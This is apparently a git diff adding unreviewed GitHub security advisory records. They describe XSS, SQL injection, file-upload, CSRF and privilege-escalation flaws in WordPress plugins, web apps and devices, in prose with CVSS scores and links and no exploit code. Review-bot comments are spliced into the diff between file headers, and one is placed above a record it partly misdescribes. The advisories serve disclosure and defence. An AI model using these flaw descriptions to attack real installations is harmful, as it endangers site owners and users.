+ "url": "https://corp.mediatek.com/product-security-bulletin/February-2024"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-w8m7-jp57-83vr/GHSA-w8m7-jp57-83vr.json b/advisories/unreviewed/2024/02/GHSA-w8m7-jp57-83vr/GHSA-w8m7-jp57-83vr.json
new file mode 100644
index 0000000000000..438bf4589ae8e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-w8m7-jp57-83vr/GHSA-w8m7-jp57-83vr.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w8m7-jp57-83vr",
+ "modified": "2024-02-08T15:30:27Z",
+ "published": "2024-02-08T15:30:27Z",
+ "aliases": [
+ "CVE-2024-24871"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative Themes Blocksy allows Stored XSS.This issue affects Blocksy: from n/a through 2.0.19.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24871"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/blocksy/wordpress-blocksy-theme-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T13:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wc7r-64xv-6vgw/GHSA-wc7r-64xv-6vgw.json b/advisories/unreviewed/2024/02/GHSA-wc7r-64xv-6vgw/GHSA-wc7r-64xv-6vgw.json
new file mode 100644
index 0000000000000..f68cc0fd99808
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wc7r-64xv-6vgw/GHSA-wc7r-64xv-6vgw.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wc7r-64xv-6vgw",
+ "modified": "2024-02-06T21:30:26Z",
+ "published": "2024-02-06T21:30:26Z",
+ "aliases": [
+ "CVE-2024-1259"
+ ],
+ "details": "A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/controllers/admin/app/AppController.php of the component API. The manipulation of the argument app_pic_url leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252998 is the identifier assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1259"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/rCt6PpJxBvuI"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252998"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252998"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json b/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json
new file mode 100644
index 0000000000000..5a37a5566e965
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wcj2-j3c5-773j/GHSA-wcj2-j3c5-773j.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wcj2-j3c5-773j",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2024-24014"
+ ],
+ "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/author/list",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24014"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/201206030/novel-plus"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24014.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T02:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wcmq-fchf-hwch/GHSA-wcmq-fchf-hwch.json b/advisories/unreviewed/2024/02/GHSA-wcmq-fchf-hwch/GHSA-wcmq-fchf-hwch.json
new file mode 100644
index 0000000000000..a203357e1d054
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wcmq-fchf-hwch/GHSA-wcmq-fchf-hwch.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wcmq-fchf-hwch",
+ "modified": "2024-02-08T21:30:38Z",
+ "published": "2024-02-08T21:30:38Z",
+ "aliases": [
+ "CVE-2024-24499"
+ ],
+ "details": "SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtfullname and txtphone parameters in the edit_profile.php component.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24499"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-SQL_Injection_Admin_Update_Profile.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wcpf-fg4c-h6ph/GHSA-wcpf-fg4c-h6ph.json b/advisories/unreviewed/2024/02/GHSA-wcpf-fg4c-h6ph/GHSA-wcpf-fg4c-h6ph.json
new file mode 100644
index 0000000000000..95ddbba94b424
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wcpf-fg4c-h6ph/GHSA-wcpf-fg4c-h6ph.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wcpf-fg4c-h6ph",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0585"
+ ],
+ "details": "The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the Image URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0585"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wf5c-mcqp-r6mq/GHSA-wf5c-mcqp-r6mq.json b/advisories/unreviewed/2024/02/GHSA-wf5c-mcqp-r6mq/GHSA-wf5c-mcqp-r6mq.json
new file mode 100644
index 0000000000000..ff192faf63636
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wf5c-mcqp-r6mq/GHSA-wf5c-mcqp-r6mq.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wf5c-mcqp-r6mq",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2023-45213"
+ ],
+ "details": "\n\n\n\n\n\n\nA potential attacker with access to the Westermo Lynx device would be able to execute malicious code that could affect the correct functioning of the device.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45213"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-942"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T22:16:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wf9p-gjmq-pmx9/GHSA-wf9p-gjmq-pmx9.json b/advisories/unreviewed/2024/02/GHSA-wf9p-gjmq-pmx9/GHSA-wf9p-gjmq-pmx9.json
new file mode 100644
index 0000000000000..3a0b77ef946b0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wf9p-gjmq-pmx9/GHSA-wf9p-gjmq-pmx9.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wf9p-gjmq-pmx9",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0380"
+ ],
+ "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 9.1.0 via the 'icon' attribute used in Shortcodes. This makes it possible for authenticated attackers, with contributor-level access and above, to include the contents of SVG files on the server, which can be leveraged for Cross-Site Scripting.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0380"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wfhx-9fx9-r5gm/GHSA-wfhx-9fx9-r5gm.json b/advisories/unreviewed/2024/02/GHSA-wfhx-9fx9-r5gm/GHSA-wfhx-9fx9-r5gm.json
new file mode 100644
index 0000000000000..5cef66e1e9815
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wfhx-9fx9-r5gm/GHSA-wfhx-9fx9-r5gm.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wfhx-9fx9-r5gm",
+ "modified": "2024-02-08T15:30:26Z",
+ "published": "2024-02-08T12:30:48Z",
+ "aliases": [
+ "CVE-2023-6517"
+ ],
+ "details": "Exposure of Sensitive Information Due to Incompatible Policies vulnerability in Mia Technology Inc. MİA-MED allows Collect Data as Provided by Users.This issue affects MİA-MED: before 1.0.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6517"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-24-0087"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-213"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T12:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wfj3-hjp7-62gf/GHSA-wfj3-hjp7-62gf.json b/advisories/unreviewed/2024/02/GHSA-wfj3-hjp7-62gf/GHSA-wfj3-hjp7-62gf.json
new file mode 100644
index 0000000000000..f0fbbadb96c2d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wfj3-hjp7-62gf/GHSA-wfj3-hjp7-62gf.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wfj3-hjp7-62gf",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-33060"
+ ],
+ "details": "Transient DOS in Core when DDR memory check is called while DDR is not initialized.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33060"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-whq9-vwxq-6f23/GHSA-whq9-vwxq-6f23.json b/advisories/unreviewed/2024/02/GHSA-whq9-vwxq-6f23/GHSA-whq9-vwxq-6f23.json
new file mode 100644
index 0000000000000..095dbc18d6814
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-whq9-vwxq-6f23/GHSA-whq9-vwxq-6f23.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-whq9-vwxq-6f23",
+ "modified": "2024-02-05T18:31:37Z",
+ "published": "2024-02-05T18:31:37Z",
+ "aliases": [
+ "CVE-2024-0953"
+ ],
+ "details": "When a user scans a QR Code with the QR Code Scanner feature, the user is not prompted before being navigated to the page specified in the code. This may surprise the user and potentially direct them to unwanted content.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0953"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1837916"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T17:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-whv2-8g4p-xpx6/GHSA-whv2-8g4p-xpx6.json b/advisories/unreviewed/2024/02/GHSA-whv2-8g4p-xpx6/GHSA-whv2-8g4p-xpx6.json
new file mode 100644
index 0000000000000..586417e767482
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-whv2-8g4p-xpx6/GHSA-whv2-8g4p-xpx6.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-whv2-8g4p-xpx6",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2024-23806"
+ ],
+ "details": "\n\n\nSensitive data can be extracted from HID iCLASS SE reader configuration cards. This could include credential and device administrator keys.\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23806"
+ },
+ {
+ "type": "WEB",
+ "url": "https://https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-02"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.hidglobal.com/support"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-287"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-whvw-59jf-hrx9/GHSA-whvw-59jf-hrx9.json b/advisories/unreviewed/2024/02/GHSA-whvw-59jf-hrx9/GHSA-whvw-59jf-hrx9.json
new file mode 100644
index 0000000000000..7a6d766a2fabc
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-whvw-59jf-hrx9/GHSA-whvw-59jf-hrx9.json
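Review bot: The second reference URL in GHSA-whv2-8g4p-xpx6 is malformed: `"url": "https://https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-02"` carries a doubled scheme and will not resolve as written, so the vendor/CISA advisory that backs the CWE-287 classification is effectively unreachable from this record; the intended value is presumably `https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-02`. Because this is an unreviewed import, the defect most likely originates in the upstream NVD reference list, and a hand edit here would be overwritten by the next sync unless the source record is corrected as well. A normalization or rejection step in the import pipeline for URLs whose host component begins with another scheme would catch this class of error before it lands in the database.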
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-whvw-59jf-hrx9",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2023-32479"
+ ],
+ "details": "\nDell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 contain privilege escalation vulnerability due to improper ACL of the non-default installation directory. A local malicious user could potentially exploit this vulnerability by replacing binaries in installed directory and taking reverse shell of the system leading to Privilege Escalation.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32479"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000215881/dsa-2023-260"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T08:15:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wj7p-x86m-qmwx/GHSA-wj7p-x86m-qmwx.json b/advisories/unreviewed/2024/02/GHSA-wj7p-x86m-qmwx/GHSA-wj7p-x86m-qmwx.json
new file mode 100644
index 0000000000000..ee0d5946f61b9
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wj7p-x86m-qmwx/GHSA-wj7p-x86m-qmwx.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wj7p-x86m-qmwx",
+ "modified": "2024-02-06T18:30:20Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2023-51534"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brave Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content allows Stored XSS.This issue affects Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content: from n/a through 0.6.2.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51534"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/brave-popup-builder/wordpress-brave-popup-plugin-0-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wj9m-8xm4-fx2j/GHSA-wj9m-8xm4-fx2j.json b/advisories/unreviewed/2024/02/GHSA-wj9m-8xm4-fx2j/GHSA-wj9m-8xm4-fx2j.json
new file mode 100644
index 0000000000000..3eb1cecfe3318
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wj9m-8xm4-fx2j/GHSA-wj9m-8xm4-fx2j.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wj9m-8xm4-fx2j",
+ "modified": "2024-02-03T09:30:18Z",
+ "published": "2024-02-03T09:30:18Z",
+ "aliases": [
+ "CVE-2023-43183"
+ ],
+ "details": "Incorrect access control in Reprise License Management Software Reprise License Manager v15.1 allows read-only users to arbitrarily change the password of an admin and hijack their account.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43183"
+ },
+ {
+ "type": "WEB",
+ "url": "https://packetstormsecurity.com/files/176841/Reprise-License-Manager-15.1-Privilege-Escalation-File-Write.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://seclists.org/fulldisclosure/2024/Jan/43"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T09:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wp72-v8x4-g8h9/GHSA-wp72-v8x4-g8h9.json b/advisories/unreviewed/2024/02/GHSA-wp72-v8x4-g8h9/GHSA-wp72-v8x4-g8h9.json
new file mode 100644
index 0000000000000..b6aa3eb3fadc7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wp72-v8x4-g8h9/GHSA-wp72-v8x4-g8h9.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wp72-v8x4-g8h9",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0374"
+ ],
+ "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'create_view' function. This makes it possible for unauthenticated attackers to create views via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0374"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wpw2-f6x3-8f7j/GHSA-wpw2-f6x3-8f7j.json b/advisories/unreviewed/2024/02/GHSA-wpw2-f6x3-8f7j/GHSA-wpw2-f6x3-8f7j.json
new file mode 100644
index 0000000000000..59992d2cd4649
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wpw2-f6x3-8f7j/GHSA-wpw2-f6x3-8f7j.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wpw2-f6x3-8f7j",
+ "modified": "2024-02-05T06:30:29Z",
+ "published": "2024-02-05T06:30:29Z",
+ "aliases": [
+ "CVE-2023-5677"
+ ],
+ "details": "Brandon\nRothel from QED Secure Solutions has found that the VAPIX API tcptest.cgi\ndid not have a sufficient input validation allowing for a possible remote code\nexecution. This flaw can only be exploited after authenticating with an\noperator- or administrator-privileged service account. The impact of exploiting\nthis vulnerability is lower with operator-privileges compared to\nadministrator-privileges service accounts. Axis has released patched AXIS OS\nversions for the highlighted flaw. Please refer to the Axis security advisory\nfor more information and solution. \n\n\n\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5677"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.axis.com/dam/public/a9/dd/f1/cve-2023-5677-en-US-424335.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-wrq2-h2ff-mxv5/GHSA-wrq2-h2ff-mxv5.json b/advisories/unreviewed/2024/02/GHSA-wrq2-h2ff-mxv5/GHSA-wrq2-h2ff-mxv5.json
new file mode 100644
index 0000000000000..c496f84c82671
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-wrq2-h2ff-mxv5/GHSA-wrq2-h2ff-mxv5.json
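Review bot: `details` carries the upstream hard line-wrapping and a run of trailing `\n` escapes (it opens with `"Brandon\nRothel"` and ends with `"solution. \n\n\n\n\n\n\n\n"`), so any renderer that honours newlines shows a broken first line followed by a block of blank lines. Normalising whitespace on import — collapsing internal newlines to spaces and stripping leading/trailing ones — would fix this record and the same padding in GHSA-x379-72wq-8vwf (leading `\n`), GHSA-xc99-434w-j882 (long leading and trailing runs) and the trailing `\n\n` in GHSA-wrq2-h2ff-mxv5, GHSA-wxhv-5vpx-mrm3 and GHSA-x5rp-83c9-9fm7. The content itself should stay as the source gave it; only the whitespace is at issue.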
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wrq2-h2ff-mxv5",
+ "modified": "2024-02-01T12:30:22Z",
+ "published": "2024-02-01T12:30:22Z",
+ "aliases": [
+ "CVE-2024-22148"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Smart Editor JoomUnited allows Reflected XSS.This issue affects JoomUnited: from n/a through 1.3.3.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22148"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/wp-smart-editor/wordpress-wp-smart-editor-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T10:15:12Z"
+ }
+}
